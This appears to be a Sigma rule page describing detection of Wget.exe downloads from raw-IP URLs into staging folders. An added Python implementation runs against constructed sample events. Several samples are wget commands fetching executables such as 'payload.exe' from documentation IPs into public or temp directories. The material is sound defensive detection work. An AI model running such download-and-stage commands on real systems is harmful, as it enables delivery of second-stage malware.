
Suspicious File Download From IP Via Wget.EXE - Paths

Sigma Rules

Summary
This detection rule monitors Windows process creation events for Wget.exe downloading a file from a URL that uses a raw IP address rather than a hostname, and writing it to a directory commonly used to stage tooling or payloads. Fetching from an IP literal avoids DNS resolution, so the download leaves no DNS query or hostname for DNS-based detections to flag; attackers and automated tooling use this to retrieve a second stage after initial access. The rule inspects the command line for Wget's output options, '-O' or '--output-document', and checks whether the destination falls under paths such as 'C:\Temp\', 'C:\Users\Public\', or per-user folders such as Pictures or Documents: user-writable, unremarkable locations where a dropped file is unlikely to attract attention. All three conditions (the Wget.exe image, an IP-literal URL, and an output path in one of those directories) must hold for the rule to fire, so a download saved to the current working directory without an output flag is not covered. Legitimate use of Wget against internal hosts addressed by IP (build scripts, software distribution) can produce hits, so matches should be triaged against the source IP, the downloaded file, and whether the user or host routinely runs Wget.
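The following is an added example, written for this page rather than taken from the Sigma rule or the Sigma project, that implements the three conditions described above as a check over process creation events and runs it on a handful of constructed sample events. It assumes the rule keys on an Image ending in '\wget.exe', and the suspicious path list is a deliberately reduced subset (the directories named in the summary); the real rule's path list is longer. The IP addresses in the samples are from the RFC 5737 documentation ranges.

```python
import re
from typing import Optional

# Assumed subset of staging directories; the real rule covers more locations.
SUSPICIOUS_PATH_PATTERNS = [
    re.compile(r'^C:\\Temp\\', re.I),
    re.compile(r'^C:\\Users\\Public\\', re.I),
    re.compile(r'^C:\\Users\\[^\\]+\\(?:Pictures|Documents)\\', re.I),
]

# http(s) URL whose host is a dotted-quad IP literal, optionally with a port.
IP_LITERAL_URL = re.compile(
    r'\bhttps?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/|\s|$)', re.I)

# Wget output option, either '-O <path>' or '--output-document=<path>';
# the path may be double-quoted (spaces) or a bare token.
OUTPUT_FLAG = re.compile(
    r'(?:^|\s)(?:-O|--output-document)(?:=|\s+)(?:"([^"]+)"|(\S+))')

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\wget.exe",
     "CommandLine": r"wget.exe http://203.0.113.10/payload.exe -O C:\Users\Public\update.exe"},
    {"Image": r"C:\Tools\wget.exe",
     "CommandLine": r"wget.exe --output-document=C:\Temp\a.dll http://198.51.100.7:8080/a.dll"},
    {"Image": r"C:\Tools\wget.exe",
     "CommandLine": r'wget.exe -O "C:\Users\alice\Documents\x.exe" http://203.0.113.10/x.exe'},
    # hostname, not an IP literal: should not match
    {"Image": r"C:\Tools\wget.exe",
     "CommandLine": r"wget.exe https://mirror.example.org/tool.zip -O C:\Users\Public\tool.zip"},
    # IP literal but destination outside the watched directories
    {"Image": r"C:\Tools\wget.exe",
     "CommandLine": r"wget.exe http://203.0.113.10/readme.txt -O C:\build\readme.txt"},
    # different downloader; out of scope for this rule
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe http://203.0.113.10/x -o C:\Temp\x"},
    # no output flag: file lands in the working directory, rule does not fire
    {"Image": r"C:\Tools\wget.exe",
     "CommandLine": r"wget.exe http://203.0.113.10/x.exe"},
]


def is_wget(image: str) -> bool:
    """Assumed image check: the process binary is named wget.exe."""
    return image.lower().endswith("\\wget.exe")


def output_path(cmdline: str) -> Optional[str]:
    """Return the destination given to -O / --output-document, or None."""
    m = OUTPUT_FLAG.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def matches_rule(event: dict) -> bool:
    """True when all three conditions hold: wget.exe, IP-literal URL,
    and an output path under one of the suspicious directories."""
    if not is_wget(event.get("Image", "")):
        return False
    cmd = event.get("CommandLine", "")
    if not IP_LITERAL_URL.search(cmd):
        return False
    path = output_path(cmd)
    if path is None:
        return False
    return any(p.match(path) for p in SUSPICIOUS_PATH_PATTERNS)


def run(events) -> list:
    """Return the command lines of the events that trigger the rule."""
    return [e["CommandLine"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    for hit in run(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

The check is stricter than a Sigma 'CommandLine|contains' match in one respect: it parses the argument following the output option rather than looking for the path substring anywhere on the command line, which avoids firing on a command whose URL merely contains the text 'C:\Temp'. Bare-token paths containing spaces are truncated at the first space, which still preserves the directory prefix the rule cares about.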
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
Created: 2024-02-23